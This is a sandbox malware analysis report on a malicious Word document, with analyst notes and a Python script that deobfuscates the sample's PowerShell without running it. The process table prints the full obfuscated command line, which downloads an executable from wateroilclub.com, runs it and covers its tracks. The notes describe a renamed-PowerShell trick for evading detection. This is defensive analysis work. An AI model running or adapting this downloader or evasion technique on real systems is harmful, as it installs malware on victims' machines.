Field | Value
---|---
File name | d1d7a097ccfd2544d3d761284432da8333ed51a11fc9ed4c3c11c07c439bbf2f
Full analysis | https://app.any.run/tasks/de487785-8d10-4914-97ce-6417a98cbdbe
Verdict | Malicious activity
Analysis date | December 14, 2018, 09:52:30
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | 
Indicators | 
MIME | application/msword
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Little Pig, Template: Normal, Last Saved By: Windows User, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Fri Dec 14 03:47:00 2018, Last Saved Time/Date: Thu Dec 13 18:09:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5 | AD2C5F31E65B8710C8230067A22E8206
SHA1 | 660A8302E26F2DDE75C66429E8675BFB846B809F
SHA256 | D1D7A097CCFD2544D3D761284432DA8333ED51A11FC9ED4C3C11C07C439BBF2F
SSDEEP | 3072:bAWAAxZStR5MBVMDk3j4CL/8orHk6mssQA8y4Q7S9JfHc+K1E7Gj0XR:bB/o5yE44O0rxnQO49v8+K2GQX
Extension | File type | Score
---|---|---
.doc | Microsoft Word document | 54.2
.doc | Microsoft Word document (old ver.) | 32.2
Field | Value
---|---
CompObjUserType | Microsoft Word 97-2003 Document
CompObjUserTypeLen | 32
HeadingPairs | 
TitleOfParts | 
HyperlinksChanged | No
SharedDoc | No
LinksUpToDate | No
ScaleCrop | No
AppVersion | 15
CharCountWithSpaces | 1
Paragraphs | 1
Lines | 1
Company | Microsoft
CodePage | Unicode (UTF-8)
Security | None
Characters | 1
Words | -
Pages | 1
ModifyDate | 2018:12:13 18:09:00
CreateDate | 2018:12:14 03:47:00
TotalEditTime | 3.0 minutes
Software | Microsoft Office Word
RevisionNumber | 4
LastModifiedBy | Windows User
Template | Normal
Keywords | -
Author | Little Pig
Subject | -
Title | -

Two details in this metadata are worth noting: ModifyDate (2018:12:13 18:09:00) is earlier than CreateDate (2018:12:14 03:47:00), and the visible document body is a single character with zero words. Nothing of interest is in the page content; the behaviour is all in the process tree below.
PID | Parent process | Path | CMD | User | Integrity level | Company | Description | Version | Exit code | Indicators
---|---|---|---|---|---|---|---|---|---|---
3012 | explorer.exe | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\d1d7a097ccfd2544d3d761284432da8333ed51a11fc9ed4c3c11c07c439bbf2f.doc" | admin | MEDIUM | Microsoft Corporation | Microsoft Word | 14.0.6024.1000 | 0 | 
1488 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\vuwln\opwgjqrdq.exe | "C:\Users\admin\AppData\Local\Temp\vuwln\opwgjqrdq.exe" $fatsdoejsmwviksttmmrmjbapm='$pa';$ixqjvizuyaxiuiadcesrs='= ''esh';$zcyiwzjgwghlkmigsgbtvmsbuou04='roce';$dgaoantyxhwyqhosetlyuthy='erh'';Set-';$uixqgmfcusnkugeqjixcdddnyo=' ''\';$inujsfenwiuxtzxxy='w-Objec';$tjoaeeehaioeatitbbie='h=($';$enraiophlpooaowlpbmcu='vuwln'')';$oeehpaexsyfpazbenk='ss; $pat';$detuyfajximwispw='s $path;R';$ylaldgbbyuyvykwiewdkauu='(''https';$yajxauywyeffjhw='t Syst';$eumaptrpfkrzauaurkfabdqju90='t-Proces';$zdxvcaonbocnyyxcnnyxxo='emo';$xxqrgnohhhrrynvlgjxjjq3='$en';$oemlzprozqsxsukcg='cy Byp';$kscsioyrqlaauyruao='m.exe'',';$iacbqrlafwmmyqzhm=' -force;';$xkxcdlthaimrzanztkc0='ent';$fnibyyimvuuvkkxb40='ile';$ysnbkaqkpjlmmwwvrieomdretredm='ass -Scop';$utzpduyaoktitgjbddpso='env:te';$usutyzyacojzst='xe'');';$fnlunxmejjiayyztjcaruvvf74='heh ';$iesxxhhonsztacuywtb='dmy.e';$kknavgjihlypsaru='lclub';$mxldyuhvoziuoueu='ionPoli';$ujwueywoiieqxii=' -recurse';$sqztnpdiyknvruungfxfob9='Star';$zliucnthuievwlieirmnd='mp+';$stecwerctloadif='Execut';$utsrqouejuiemfez='et.Webcli';$agmrtdopxvzqncnielzsyspkba='$rb';$ivkdyxarcqpaixipvznju9=').Downl';$biraleqoosjuyugeq='://wa';$ioitprwatxacvlejgvniea='(Ne';$ubakcyieavarweoamgg='.com/f';$fjehwklrayabewoiiumclwc60='ve-Item (';$ubjjmeyyiyiwcnznfqo='ile/dw';$iobgimwmauzufmiuxobafz='e P';$ickzixqoyinkgpclbfryfo='oadF';$qixbqbfjabtfwymxebpmwpzbmhln='em.N';$icgzkxdyjqqwvuyuwxxxopse08='th); ';$qmoiaiyuyeptnwvlg='v:temp +';$cuoopnzlsrxeedfhigusez='teroi';$xmduafsdsualmleajuecjey05='ers';$npaqnzyeoeibxvuo='''\einmrm'; Invoke-Expression ($agmrtdopxvzqncnielzsyspkba+$xmduafsdsualmleajuecjey05+$fnlunxmejjiayyztjcaruvvf74+$ixqjvizuyaxiuiadcesrs+$dgaoantyxhwyqhosetlyuthy+$stecwerctloadif+$mxldyuhvoziuoueu+$oemlzprozqsxsukcg+$ysnbkaqkpjlmmwwvrieomdretredm+$iobgimwmauzufmiuxobafz+$zcyiwzjgwghlkmigsgbtvmsbuou04+$oeehpaexsyfpazbenk+$tjoaeeehaioeatitbbie+$utzpduyaoktitgjbddpso+$zliucnthuievwlieirmnd+$npaqnzyeoeibxvuo+$iesxxhhonsztacuywtb+$usutyzyacojzst+$ioitprwatxacvlejgvniea+$inujsfenwiuxtzxxy+$yajxauywyeffjhw+$qixbqbfjabtfwymxebpmwpzbmhln+$utsrqouejuiemfez+$xkxcdlthaimrzanztkc0+$ivkdyxarcqpaixipvznju9+$ickzixqoyinkgpclbfryfo+$fnibyyimvuuvkkxb40+$ylaldgbbyuyvykwiewdkauu+$biraleqoosjuyugeq+$cuoopnzlsrxeedfhigusez+$kknavgjihlypsaru+$ubakcyieavarweoamgg+$ubjjmeyyiyiwcnznfqo+$kscsioyrqlaauyruao+$fatsdoejsmwviksttmmrmjbapm+$icgzkxdyjqqwvuyuwxxxopse08+$sqztnpdiyknvruungfxfob9+$eumaptrpfkrzauaurkfabdqju90+$detuyfajximwispw+$zdxvcaonbocnyyxcnnyxxo+$fjehwklrayabewoiiumclwc60+$xxqrgnohhhrrynvlgjxjjq3+$qmoiaiyuyeptnwvlg+$uixqgmfcusnkugeqjixcdddnyo+$enraiophlpooaowlpbmcu+$ujwueywoiieqxii+$iacbqrlafwmmyqzhm); | admin | MEDIUM | Microsoft Corporation | Windows PowerShell | 6.1.7600.16385 (win7_rtm.090713-1255) | 0 | 
2556 | opwgjqrdq.exe | C:\Users\admin\AppData\Local\Temp\einmrmdmy.exe | "C:\Users\admin\AppData\Local\Temp\einmrmdmy.exe" | admin | MEDIUM | Oscar Health Insurance Co. | Reviews Signals | 3.6.5.2 | 3221225622 (0xC0000096, STATUS_PRIVILEGED_INSTRUCTION) | 

Notes on the process tree, derived from the rows above and the file list below. opwgjqrdq.exe carries the version resource of powershell.exe (Microsoft Corporation, "Windows PowerShell", 6.1.7600.16385), and the files WINWORD.EXE wrote under %TEMP%\vuwln (the *.format.ps1xml files, CompiledComposition.Microsoft.PowerShell.GPowerShell.dll, en-US\about_Assignment_Operators.help.txt) are the contents of the PowerShell install directory: the document copies that directory to a random name and runs the copy, so a rule keyed on the image name powershell.exe does not fire, while the PE description and version fields, or a hash of the image, still identify it. The command line assigns 47 string fragments to random variable names and joins them in a different order inside Invoke-Expression (the page rendered the fragment 'h=($' as a GUID and an HTML entity; it is restored here, since the dropped file path requires the $). Read in concatenation order the script sets the execution policy to Bypass for the process, downloads https://wateroilclub.com/file/dwm.exe to %TEMP%\einmrmdmy.exe with System.Net.WebClient.DownloadFile, starts it, and then deletes %TEMP%\vuwln, removing the copied PowerShell. The downloaded einmrmdmy.exe, whose version resource claims "Oscar Health Insurance Co." / "Reviews Signals", connected to formixing.com:443 and exited with 3221225622, which is NTSTATUS 0xC0000096 (STATUS_PRIVILEGED_INSTRUCTION).
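The command line of PID 1488 can be decoded without ever running it. The script below is an added example and not part of the ANY.RUN report: it embeds the recorded command line, parses the `$name='value'` assignments (PowerShell single-quoted literals, in which `''` stands for one quote), replays the `+` concatenation inside `Invoke-Expression(...)`, and pulls the URL and `%TEMP%` paths out of the result. The restored `'h=($'` fragment is an inference from the dropped file path where the page garbled the command line; the function names and regular expressions are the example's own.

```python
"""Static reconstruction of the string PID 1488 passes to Invoke-Expression.

Added example, not part of the ANY.RUN report. The sample's PowerShell is
treated purely as text: nothing here evaluates it.
"""
import re

# Command line of PID 1488 as recorded in the process table, split over several
# Python literals for readability. The value 'h=($' is the fragment the page
# garbled; the '$' is required for the decoded script to read
# $path=($env:temp+'\einmrmdmy.exe'), which matches the file actually dropped.
CMDLINE_1488 = (
    r"$fatsdoejsmwviksttmmrmjbapm='$pa';$ixqjvizuyaxiuiadcesrs='= ''esh';"
    r"$zcyiwzjgwghlkmigsgbtvmsbuou04='roce';$dgaoantyxhwyqhosetlyuthy='erh'';Set-';"
    r"$uixqgmfcusnkugeqjixcdddnyo=' ''\';$inujsfenwiuxtzxxy='w-Objec';"
    r"$tjoaeeehaioeatitbbie='h=($';$enraiophlpooaowlpbmcu='vuwln'')';"
    r"$oeehpaexsyfpazbenk='ss; $pat';$detuyfajximwispw='s $path;R';"
    r"$ylaldgbbyuyvykwiewdkauu='(''https';$yajxauywyeffjhw='t Syst';"
    r"$eumaptrpfkrzauaurkfabdqju90='t-Proces';$zdxvcaonbocnyyxcnnyxxo='emo';"
    r"$xxqrgnohhhrrynvlgjxjjq3='$en';$oemlzprozqsxsukcg='cy Byp';"
    r"$kscsioyrqlaauyruao='m.exe'',';$iacbqrlafwmmyqzhm=' -force;';"
    r"$xkxcdlthaimrzanztkc0='ent';$fnibyyimvuuvkkxb40='ile';"
    r"$ysnbkaqkpjlmmwwvrieomdretredm='ass -Scop';$utzpduyaoktitgjbddpso='env:te';"
    r"$usutyzyacojzst='xe'');';$fnlunxmejjiayyztjcaruvvf74='heh ';"
    r"$iesxxhhonsztacuywtb='dmy.e';$kknavgjihlypsaru='lclub';"
    r"$mxldyuhvoziuoueu='ionPoli';$ujwueywoiieqxii=' -recurse';"
    r"$sqztnpdiyknvruungfxfob9='Star';$zliucnthuievwlieirmnd='mp+';"
    r"$stecwerctloadif='Execut';$utsrqouejuiemfez='et.Webcli';"
    r"$agmrtdopxvzqncnielzsyspkba='$rb';$ivkdyxarcqpaixipvznju9=').Downl';"
    r"$biraleqoosjuyugeq='://wa';$ioitprwatxacvlejgvniea='(Ne';"
    r"$ubakcyieavarweoamgg='.com/f';$fjehwklrayabewoiiumclwc60='ve-Item (';"
    r"$ubjjmeyyiyiwcnznfqo='ile/dw';$iobgimwmauzufmiuxobafz='e P';"
    r"$ickzixqoyinkgpclbfryfo='oadF';$qixbqbfjabtfwymxebpmwpzbmhln='em.N';"
    r"$icgzkxdyjqqwvuyuwxxxopse08='th); ';$qmoiaiyuyeptnwvlg='v:temp +';"
    r"$cuoopnzlsrxeedfhigusez='teroi';$xmduafsdsualmleajuecjey05='ers';"
    r"$npaqnzyeoeibxvuo='''\einmrm'; Invoke-Expression "
    r"($agmrtdopxvzqncnielzsyspkba+$xmduafsdsualmleajuecjey05+$fnlunxmejjiayyztjcaruvvf74"
    r"+$ixqjvizuyaxiuiadcesrs+$dgaoantyxhwyqhosetlyuthy+$stecwerctloadif+$mxldyuhvoziuoueu"
    r"+$oemlzprozqsxsukcg+$ysnbkaqkpjlmmwwvrieomdretredm+$iobgimwmauzufmiuxobafz"
    r"+$zcyiwzjgwghlkmigsgbtvmsbuou04+$oeehpaexsyfpazbenk+$tjoaeeehaioeatitbbie"
    r"+$utzpduyaoktitgjbddpso+$zliucnthuievwlieirmnd+$npaqnzyeoeibxvuo+$iesxxhhonsztacuywtb"
    r"+$usutyzyacojzst+$ioitprwatxacvlejgvniea+$inujsfenwiuxtzxxy+$yajxauywyeffjhw"
    r"+$qixbqbfjabtfwymxebpmwpzbmhln+$utsrqouejuiemfez+$xkxcdlthaimrzanztkc0"
    r"+$ivkdyxarcqpaixipvznju9+$ickzixqoyinkgpclbfryfo+$fnibyyimvuuvkkxb40"
    r"+$ylaldgbbyuyvykwiewdkauu+$biraleqoosjuyugeq+$cuoopnzlsrxeedfhigusez+$kknavgjihlypsaru"
    r"+$ubakcyieavarweoamgg+$ubjjmeyyiyiwcnznfqo+$kscsioyrqlaauyruao+$fatsdoejsmwviksttmmrmjbapm"
    r"+$icgzkxdyjqqwvuyuwxxxopse08+$sqztnpdiyknvruungfxfob9+$eumaptrpfkrzauaurkfabdqju90"
    r"+$detuyfajximwispw+$zdxvcaonbocnyyxcnnyxxo+$fjehwklrayabewoiiumclwc60+$xxqrgnohhhrrynvlgjxjjq3"
    r"+$qmoiaiyuyeptnwvlg+$uixqgmfcusnkugeqjixcdddnyo+$enraiophlpooaowlpbmcu+$ujwueywoiieqxii"
    r"+$iacbqrlafwmmyqzhm);"
)

# $name='...' where the literal is PowerShell single-quoted: '' is one quote.
ASSIGN_RE = re.compile(r"\$([A-Za-z0-9_]+)='((?:[^']|'')*)'")
# The concatenation handed to Invoke-Expression, up to the closing parenthesis.
IEX_RE = re.compile(r"Invoke-Expression\s*\((.*)\)\s*;?\s*$", re.S)
VAR_RE = re.compile(r"\$([A-Za-z0-9_]+)")


def parse_assignments(cmdline: str) -> dict:
    """Map each obfuscation variable to its unescaped string value."""
    return {m.group(1): m.group(2).replace("''", "'")
            for m in ASSIGN_RE.finditer(cmdline)}


def concat_order(cmdline: str) -> list:
    """Variable names in the order they are joined inside Invoke-Expression(...)."""
    m = IEX_RE.search(cmdline)
    if not m:
        raise ValueError("no Invoke-Expression(...) call found")
    return VAR_RE.findall(m.group(1))


def deobfuscate(cmdline: str) -> str:
    """Return the plaintext script Invoke-Expression would have evaluated."""
    values = parse_assignments(cmdline)
    order = concat_order(cmdline)
    missing = [name for name in order if name not in values]
    if missing:  # a fragment the regex did not capture; refuse to guess
        raise ValueError(f"unresolved variables: {missing}")
    return "".join(values[name] for name in order)


def extract_iocs(script: str) -> dict:
    """Pull the download URL and the %TEMP%-relative paths from the plaintext."""
    urls = re.findall(r"https?://[^\s',)]+", script)
    temp_paths = re.findall(r"\$env:temp\s*\+\s*'([^']+)'", script)
    return {"urls": urls, "temp_paths": temp_paths}


if __name__ == "__main__":
    decoded = deobfuscate(CMDLINE_1488)
    print(decoded)
    print(extract_iocs(decoded))
```

Running the script prints the one-line PowerShell that the sample actually evaluated; the URL and the two `%TEMP%` paths it yields should line up with the file list and the network table, which is the check that the reconstruction is right. Only this assignment-then-concatenate pattern is handled: other layers (`-join` over `[char]` arrays, `-f` format strings, `-EncodedCommand` base64) need their own step, and in every case the decoded text stays in a string and never reaches Invoke-Expression on the analyst's machine.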
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA636.tmp.cvr | — | — | —
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\vuwln\Certificate.format.ps1xml | xml | C93A361112351B30E2C959E72789952D | 4379BD59C1328A6811584D424DF3DC193A5D607E2859D3AC1655B9124A5F100D
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\vuwln\Diagnostics.Format.ps1xml | text | FF6EEB8125B9265C5BA40AF9F7C6F6BC | 7D569C1155CFA9B7BB2BA225EE409A55C8B0E8217F3A7E05BAA39DA1BD7C4689
3012 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | 69FC8F52154581008D9EDFF0BCB1CE6C | 0C142B55E5EF4D064F74BC3B627C07F11051DA8D47250A8CB288FCC0787B3ADD
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\vuwln\DotNetTypes.format.ps1xml | xml | 1AB2FD4B6749AD6831C86411FDCAFB48 | 98540086CFC986D7604FFDED977EF20944D1715BF8453809CE736C919CB6E1EF
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\vuwln\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll | executable | A84B6952AB6A297CCE6C085FA8AB06CB | 54E3F8199D5C749920A2826C63D7C5E7E86D94874ADDCFD5C9B430671031017D
3012 | WINWORD.EXE | C:\Users\admin\Downloads\~$d7a097ccfd2544d3d761284432da8333ed51a11fc9ed4c3c11c07c439bbf2f.doc | pgc | 77BDB8BAA77DF0A3B64CE06387255E61 | 9E67FD845F15B4F7029BE9912AD1DCB616952B3F6186185787F20E7947725A03
3012 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\d1d7a097ccfd2544d3d761284432da8333ed51a11fc9ed4c3c11c07c439bbf2f.doc.LNK | lnk | 90A2F8FDBB7044B68D32B8CDD5E23D35 | 22CD5305F87574A20A307E9DE699C7ABE458ECD6D7737C0450E29FD230EF231C
3012 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 9E8D79FE4829E8F64E4BE39C4E832C6E | 42B3287FE60F83E039C27FA4A191D6193E89DCC9DBEAC6F925DCDCC00C608DFF
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\vuwln\en-US\about_Assignment_Operators.help.txt | text | D2DD0C7C3423CDC0040B68FBC475428E | 4DA2F663032A15D4ECB7A6FCB6DF8D5C07D097ED8D3FA9EC054D676584C4B411
PID | Process | IP | Domain | ASN | CN | Reputation
---|---|---|---|---|---|---
2556 | einmrmdmy.exe | 185.244.149.78:443 | formixing.com | — | — | unknown
1488 | opwgjqrdq.exe | 204.44.118.201:443 | wateroilclub.com | QuadraNet, Inc | US | unknown
Domain | IP | Reputation
---|---|---
wateroilclub.com | | unknown
formixing.com | | malicious